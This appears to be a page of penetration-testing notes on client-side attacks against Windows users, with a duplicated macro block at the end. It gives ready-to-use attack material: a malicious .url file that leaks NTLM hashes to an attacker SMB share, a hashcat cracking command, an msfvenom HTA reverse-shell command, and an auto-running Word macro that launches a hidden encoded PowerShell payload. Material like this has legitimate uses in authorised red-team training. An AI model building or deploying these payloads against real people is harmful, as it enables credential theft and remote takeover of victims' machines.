Client Side Attacks

URL Attack (Formerly SCF)

If there is a location a user is reading files from, like FTP or SMB, use a file like this to grab their hash with SMBServer.py or Responder once they click it. Then crack it with Hashcat.

smbserver.py share . -smb2support

[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\192.168.56.128\%USERNAME%.icon
IconIndex=1

Create it as a .txt and save as .url before sending or putting in location for user

hashcat -m 5600 hash.txt /root/rockyou.txt --force

HTA

HTML Applications that will get executed by mshta.exe if user is on IE or Edge (with Edge the user has more security notifications to click through

msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$PORT -f hta-psh -o shell.hta

Host the file with a web server or upload it in a known place where the user will open

Macro

Create a macro in a Word doc that will auto-launch on opening to give a reverse shell
Can use the previous msfvenom command to copy a powershell payload or just use revshells.com
Split the powershell payload as you aren't allowed the full amount of characters on a single line

str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZQB3AC....."
n = 50
for i in range(0, len(str), n):
print "Str = Str + " + '"' + str[i:i+n] + '"'

Then add the payload into the macro

Sub AutoOpen()
		MyMacroName
End Sub

Sub Document_Open()
		MyMacroName
End Sub

Sub MyMacroName()
		Dim Str As String
		
		Str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZ"
		Str = Str + "QB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQB"
		Str = Str + "TAHQAcgBlAGEAbQAoACwAWwBDAG8AbgB2AGUAcgB0AF0AOgA6A"
		Str = Str + "EYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAEg"
		Str = Str + "ANABzAEkAQQBBAEEAQQBBAEEAQQBFAEEATAAxAFgANgAyACsAY"
		Str = Str + "gBTAEIARAAvAG4ARQBqADUASAAvAGgAZwBDAFoAQwBJAFoAUgB"
		...
		Str = Str + "AZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0Ac"
		Str = Str + "AByAGUAcwBzACkADQAKACQAcwB0AHIAZQBhAG0AIAA9ACAATgB"
		Str = Str + "lAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtA"
		Str = Str + "FIAZQBhAGQAZQByACgAJABnAHoAaQBwACkADQAKAGkAZQB4ACA"
		Str = Str + "AJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAVABvAEUAbgBkACgAK"
		Str = Str + "QA="
		
		CreateObject("Wscript.Shell").Run Str
End Sub

PreviousFinding Users NextPowerShell Domain Enumeration

Last updated 2 years ago

Sub AutoOpen() MyMacroName End Sub Sub Document_Open() MyMacroName End Sub Sub MyMacroName() Dim Str As String Str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZ" Str = Str + "QB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQB" Str = Str + "TAHQAcgBlAGEAbQAoACwAWwBDAG8AbgB2AGUAcgB0AF0AOgA6A" Str = Str + "EYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAEg" Str = Str + "ANABzAEkAQQBBAEEAQQBBAEEAQQBFAEEATAAxAFgANgAyACsAY" Str = Str + "gBTAEIARAAvAG4ARQBqADUASAAvAGgAZwBDAFoAQwBJAFoAUgB" ... Str = Str + "AZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0Ac" Str = Str + "AByAGUAcwBzACkADQAKACQAcwB0AHIAZQBhAG0AIAA9ACAATgB" Str = Str + "lAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtA" Str = Str + "FIAZQBhAGQAZQByACgAJABnAHoAaQBwACkADQAKAGkAZQB4ACA" Str = Str + "AJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAVABvAEUAbgBkACgAK" Str = Str + "QA=" CreateObject("Wscript.Shell").Run Str End Sub